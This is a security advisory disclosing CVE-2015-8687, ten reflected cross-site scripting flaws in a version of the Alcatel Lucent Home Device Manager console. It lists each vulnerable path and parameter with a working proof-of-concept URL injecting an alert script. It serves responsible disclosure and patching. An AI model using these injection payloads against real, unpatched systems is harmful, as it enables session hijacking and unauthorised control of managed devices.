Alcatel Lucent Home Device Manager Cross Site Scripting

`Document Title:  
===============  
Alcatel Lucent Home Device Manager - Management Console Multiple XSS  
  
CVE-Number:  
===========  
CVE-2015-8687  
  
Release Date:  
=============  
03 Jan 2016  
  
Abstract Advisory Information:  
=============================  
Ugur Cihan Koc discovered ten Reflected XSS  
vulnerabilities Alcatel Lucent Home Device Manager - Management Console  
  
Vulnerability Disclosure Timeline:  
==================================  
10 Dec 2015 Bug reported to the vendor.  
10 Dec 2015 Vendor returned ; investigating  
16 Dec 2015 Vendor has validated the issues & fixed  
27 Dec 2015 CVE number assigned  
03 Jan 2016 Disclosured  
  
Affected Product(s):  
====================  
Alcatel Lucent Home Device Manager - Management Console 4.1.10.5  
may be old version could be affected  
  
Exploitation Technique:  
=======================  
Local, Authenticated  
  
Severity Level:  
===============  
High  
  
Technical Details & Description:  
================================  
Ø Sample Payload : 42f8b36<script>alert(1)<%2fscript>152b4  
  
Ø Affected Path/Parameter: [10 parameter]  
  
1. /hdm/DeviceType/getDeviceType.do [deviceTypeID parameter]  
o  
http://10.240.71.198:7003/hdm/DeviceType/getDeviceType.do?deviceTypeID=42f8b36  
<script>alert(1)<%2fscript>152b4  
  
2. /hdm/PolicyAction/findPolicyActions.do [policyActionClass parameter]  
o  
http://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1&policyActionName=&policyActionClass=c9e31  
"><script>alert(1)<%2fscript>3bd174ff207&policyActionFunction=0  
  
3. /hdm/PolicyAction/findPolicyActions.do [policyActionName parameter]  
o  
http://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1&policyActionName=553a3  
"><script>alert(1)<%2fscript>721d335792b&policyActionClass=&policyActionFunction=0  
  
4. /hdm/SingleDeviceMgmt/getDevice.do [deviceID parameter]  
o  
http://10.240.71.198:7003/hdm/SingleDeviceMgmt/getDevice.do?deviceID=8001a1a0b  
<script>alert(1)<%2fscript>1a032  
  
5. /hdm/ajax.do [operation parameter]  
o http://10.240.71.198:7003/hdm/ajax.do?operation=getDeviceById0fa81  
<script>alert(1)<%2fscript>238957ca4e0&deviceId=8001  
  
6. /hdm/device/editDevice.do [deviceID parameter]  
o http://10.240.71.198:7003/hdm/device/editDevice.do?deviceID=8001c94e5  
<script>alert(1)<%2fscript>45f4a  
  
7. /hdm/policy/findPolicies.do [policyAction parameter]  
o  
http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=&policyAction=19f01  
"><script>alert(1)<%2fscript>b37ee8333eb&policyClass=&policyStatus=&trigger=trigger_all  
  
8. /hdm/policy/findPolicies.do [policyClass parameter]  
o  
http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=&policyAction=&policyClass=c77cb  
"><script>alert(1)<%2fscript>5ddc63ced2e&policyStatus=&trigger=trigger_all  
  
9. /hdm/policy/findPolicies.do [policyName parameter]  
o  
http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=654dd  
"><script>alert(1)<%2fscript>5b8329ee237&policyAction=&policyClass=&policyStatus=&trigger=trigger_all  
  
10. /hdm/xmlHttp.do [operation parameter]  
o  
http://10.240.71.198:7003/hdm/xmlHttp.do?operation=getQueuedActionsd4b0c  
<script>alert(1)<%2fscript>217f045ae1f&deviceID=8001  
  
  
  
Proof of Concept (PoC):  
=======================  
POC Video;  
https://drive.google.com/file/d/0B-LWHbwdK3P9Y3UyZnFmZjJqa1U/view?usp=sharing  
  
Solution Fix & Patch:  
====================  
Fixed version of 4.2  
  
Security Risk:  
==============  
The risk of the vulnerability above estimated as high.  
  
Credits & Authors:  
==================  
Ugur Cihan Koc(@_uceka_)  
Blog: www.uceka.com  
  
  
`